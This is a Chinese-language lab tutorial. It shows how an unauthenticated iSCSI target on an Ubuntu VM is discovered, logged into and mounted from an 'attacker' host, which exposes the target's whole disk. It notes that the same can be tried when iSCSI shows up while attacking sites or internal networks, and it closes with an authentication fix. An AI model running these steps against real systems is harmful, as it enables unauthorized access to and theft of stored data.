环境搭建

  • Target
    • OS: ubuntu 14.04
    • IP: 192.168.197.135
  • Attacker
    • OS: CentOS 7
    • IP: 192.168.197.136

配置ISCSI服务端

安装iscsitarget

# apt-get install iscsitarget

修改配置文件/etc/default/iscsitarget

ISCSITARGET_ENABLE=true
ISCSITARGET_MAX_SLEEP=3


# ietd options
# See ietd(8) for details
ISCSITARGET_OPTIONS=""

修改另一个配置文件:/etc/iet/ietd.conf

Target iqn.2016-08.ll.test:storage
    Lun 0 Path=/dev/sda,Type=fileio,ScsiId=lun0,ScsiSN=lun0

然后重启iscsi服务:

# /etc/init.d/iscsitarget restart
* Removing iSCSI enterprise target devices:[ OK ]
* Stopping iSCSI enterprise target service:[ OK ]
* Removing iSCSI enterprise target modules:[ OK ]
* Starting iSCSI enterprise target service:[ OK ]

测试过程

先来安装相关的工具:

sudo yum install epel-release
sudo yum install scsi-target-utils
sudo yum install iscsi-initiator-utils

然后我们来获取目标的iqn,如果获取失败,可以检查一下是否有开启iscsid服务,没有的话通过service iscsi start开启。

$ sudo iscsiadm --mode discovery --type sendtargets --portal 192.168.197.135
192.168.197.135:3260,1 iqn.2016-08.ll.test:storage
172.17.42.1:3260,1 iqn.2016-08.ll.test:storage

发现了iqn之后,挂载磁盘就可以了

$ sudo iscsiadm -m node -T iqn.2016-08.ll.test:storage -p 192.168.197.135 -l
Logging in to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] (multiple)
Login to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] successful.

看一下挂载到了什么位置

sudo fdisk -l

Disk /dev/sda: 21.5 GB, 21474836480 bytes, 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x0004df07

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048     1026047      512000   83  Linux
/dev/sda2         1026048    41943039    20458496   8e  Linux LVM

Disk /dev/mapper/centos-root: 18.8 GB, 18756927488 bytes, 36634624 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/mapper/centos-swap: 2147 MB, 2147483648 bytes, 4194304 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/sdc: 42.9 GB, 42949672960 bytes, 83886080 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x00023447

   Device Boot      Start         End      Blocks   Id  System
/dev/sdc1   *        2048    79693823    39845888   83  Linux
/dev/sdc2        79695870    83884031     2094081    5  Extended
/dev/sdc5        79695872    83884031     2094080   82  Linux swap / Solaris

其中sdc就是被挂载的ubuntu,mount处理一下

# mkdir /tmp/ubuntu
# mount /dev/sdc1 /tmp/ubuntu
# cd /tmp/ubuntu

这样就可以访问到ubuntu中的文件了。
所以如果在日站的时候和内网发现了iscsi服务,可以尝试着挂载一下。

断开连接

iscsiadm -m node -u

修复

对于该漏洞的修复也十分简单,只要增加认证就可以了,但是密码的长度似乎不能超过12个字符。
修改配置文件为:

Target iqn.2016-08.ll.test:storage
    Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1
    incominguser your_username your_password

如果需要连接带有密码的iscsi,则需要在配置文件/etc/iscsi/iscsid.conf中配置好才可以连接。
如果在ubuntu上连接iscsi服务的话,需要安装open-iscsi和open-iscsi-utils才可以。